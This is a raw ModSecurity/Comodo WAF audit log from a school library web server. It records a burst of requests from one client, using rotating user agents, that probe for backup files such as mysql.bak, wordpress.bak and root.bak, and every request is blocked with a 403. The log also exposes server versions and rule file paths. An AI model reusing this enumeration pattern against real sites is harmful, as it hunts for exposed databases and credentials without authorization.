SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4eeda311-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227774188 1984 (- - -) Stopwatch2: 1747683227774188 1984; combined=788, p1=414, p2=347, p3=0, p4=0, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eeda311-Z-- --7f41984a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopEQAAAAs 103.236.140.4 34924 103.236.140.4 8181 --7f41984a-B-- GET /smkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530881 --7f41984a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f41984a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227863077 2254 (- - -) Stopwatch2: 1747683227863077 2254; combined=781, p1=327, p2=420, p3=0, p4=0, p5=34, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f41984a-Z-- --f0b02d27-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopEgAAABI 103.236.140.4 34924 103.236.140.4 8181 --f0b02d27-B-- GET /mysql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182537 --f0b02d27-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0b02d27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227867995 1589 (- - -) Stopwatch2: 1747683227867995 1589; combined=581, p1=296, p2=261, p3=0, p4=0, p5=24, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0b02d27-Z-- --a2b0c071-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopEwAAABU 103.236.140.4 34924 103.236.140.4 8181 --a2b0c071-B-- GET /smkn22jakarta.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182542 --a2b0c071-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a2b0c071-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227871376 1810 (- - -) Stopwatch2: 1747683227871376 1810; combined=713, p1=310, p2=376, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2b0c071-Z-- --c9de9a18-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oUQAAAFQ 103.236.140.4 35018 103.236.140.4 8181 --c9de9a18-B-- GET /faisunzip.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871956 --c9de9a18-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c9de9a18-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227890315 2284 (- - -) Stopwatch2: 1747683227890315 2284; combined=711, p1=309, p2=374, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9de9a18-Z-- --78dd331c-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oUgAAAEw 103.236.140.4 35018 103.236.140.4 8181 --78dd331c-B-- GET /website.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182570 --78dd331c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --78dd331c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227896385 2342 (- - -) Stopwatch2: 1747683227896385 2342; combined=967, p1=478, p2=451, p3=0, p4=0, p5=38, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78dd331c-Z-- --37c73057-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oUwAAAE0 103.236.140.4 35018 103.236.140.4 8181 --37c73057-B-- GET /vb.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/60.0.3255.170 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871967 --37c73057-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --37c73057-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227902507 1825 (- - -) Stopwatch2: 1747683227902507 1825; combined=702, p1=347, p2=328, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37c73057-Z-- --2e36762a-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oVAAAAEo 103.236.140.4 35018 103.236.140.4 8181 --2e36762a-B-- GET /wordpress.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700205 --2e36762a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2e36762a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227914303 2458 (- - -) Stopwatch2: 1747683227914303 2458; combined=960, p1=429, p2=496, p3=0, p4=0, p5=35, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e36762a-Z-- --038fc022-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oVgAAAFE 103.236.140.4 35018 103.236.140.4 8181 --038fc022-B-- GET /1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530892 --038fc022-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --038fc022-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227926802 1891 (- - -) Stopwatch2: 1747683227926802 1891; combined=648, p1=293, p2=330, p3=0, p4=0, p5=25, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --038fc022-Z-- --6700f02b-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopFwAAABc 103.236.140.4 34924 103.236.140.4 8181 --6700f02b-B-- GET /2021.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.58 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182585 --6700f02b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6700f02b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227927999 1803 (- - -) Stopwatch2: 1747683227927999 1803; combined=626, p1=292, p2=311, p3=0, p4=0, p5=23, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6700f02b-Z-- --cee11b1b-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopHAAAAA0 103.236.140.4 34924 103.236.140.4 8181 --cee11b1b-B-- GET /asp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871987 --cee11b1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cee11b1b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227940642 2541 (- - -) Stopwatch2: 1747683227940642 2541; combined=767, p1=263, p2=473, p3=0, p4=0, p5=31, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cee11b1b-Z-- --cd004a6c-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oWAAAAEY 103.236.140.4 35018 103.236.140.4 8181 --cd004a6c-B-- GET /root.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152633461 --cd004a6c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cd004a6c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227941260 2126 (- - -) Stopwatch2: 1747683227941260 2126; combined=837, p1=427, p2=379, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd004a6c-Z-- --1ad9d82a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopHQAAAAU 103.236.140.4 34924 103.236.140.4 8181 --1ad9d82a-B-- GET /erpustakaan.smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530908 --1ad9d82a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1ad9d82a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227943441 1860 (- - -) Stopwatch2: 1747683227943441 1860; combined=749, p1=329, p2=392, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad9d82a-Z-- --042f664a-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oWgAAAE4 103.236.140.4 35018 103.236.140.4 8181 --042f664a-B-- GET /2020.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152764517 --042f664a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --042f664a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227948625 1548 (- - -) Stopwatch2: 1747683227948625 1548; combined=569, p1=274, p2=271, p3=0, p4=0, p5=24, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --042f664a-Z-- --12e6e838-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oWwAAAFg 103.236.140.4 35018 103.236.140.4 8181 --12e6e838-B-- GET /2017.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871994 --12e6e838-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --12e6e838-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227955409 1590 (- - -) Stopwatch2: 1747683227955409 1590; combined=562, p1=263, p2=276, p3=0, p4=0, p5=23, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12e6e838-Z-- --8373d531-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopHwAAAAc 103.236.140.4 34924 103.236.140.4 8181 --8373d531-B-- GET /clients.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0.2) Gecko/20100101 Firefox/66.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700221 --8373d531-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8373d531-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227955395 1783 (- - -) Stopwatch2: 1747683227955395 1783; combined=546, p1=259, p2=259, p3=0, p4=0, p5=28, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8373d531-Z-- --1b617627-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oXAAAAEM 103.236.140.4 35018 103.236.140.4 8181 --1b617627-B-- GET /2010.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.1.2) Gecko/20100101 Firefox/52.1.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871997 --1b617627-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1b617627-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227958023 1580 (- - -) Stopwatch2: 1747683227958023 1580; combined=663, p1=358, p2=279, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 